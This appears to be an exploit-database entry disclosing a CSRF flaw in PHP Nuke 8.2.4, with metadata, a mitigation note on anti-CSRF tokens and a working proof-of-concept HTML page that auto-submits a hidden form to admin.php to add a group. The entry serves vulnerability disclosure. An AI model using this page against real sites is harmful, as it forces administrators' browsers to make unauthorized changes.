CSRF vulnerability

vendor:

PHP Nuke

by:

sajith

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: PHP Nuke

Affected Version From: 8.2.4

Affected Version To: 8.2.4

Patch Exists: N/A

Related CWE: N/A

CPE: a:phpnuke:phpnuke:8.2.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2020

This exploit is a proof-of-concept (POC) for a CSRF vulnerability in PHP Nuke 8.2.4. The exploit uses a malicious HTML page to submit a form to the vulnerable application, which adds a new group with the name “testing” and description “testing for CSRF”. The form is submitted using a JavaScript script.

Mitigation:

To mitigate CSRF attacks, the application should use anti-CSRF tokens, which are randomly generated strings that are sent with each request and verified by the server.

Source

Exploit-DB raw data:

###########################################################
[~] Exploit Title:CSRF vulnerability
[~] Author: sajith
[~] version: PHP Nuke 8.2.4
[~] vulnerable app link:http://phpnuke.org/modules.php?name=Release
###########################################################
 [CSRF add group]

<html lang="en">
<head>
<title>CSRF POC( PHP nuke 8.2.4)</title>
</head>
<body>
<form action="http://127.0.0.1/phpnuke-release-8.2.4/phpnuke/html/admin.php"
id="formid" method="post">
<input type="hidden" name="name" value="testing" />
<input type="hidden" name="description"
value="testing+for+CSRF%3Cbr+%2F%3E" />
<input type="hidden" name="points" value="0" />
<input type="hidden" name="op" value="grp_add" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>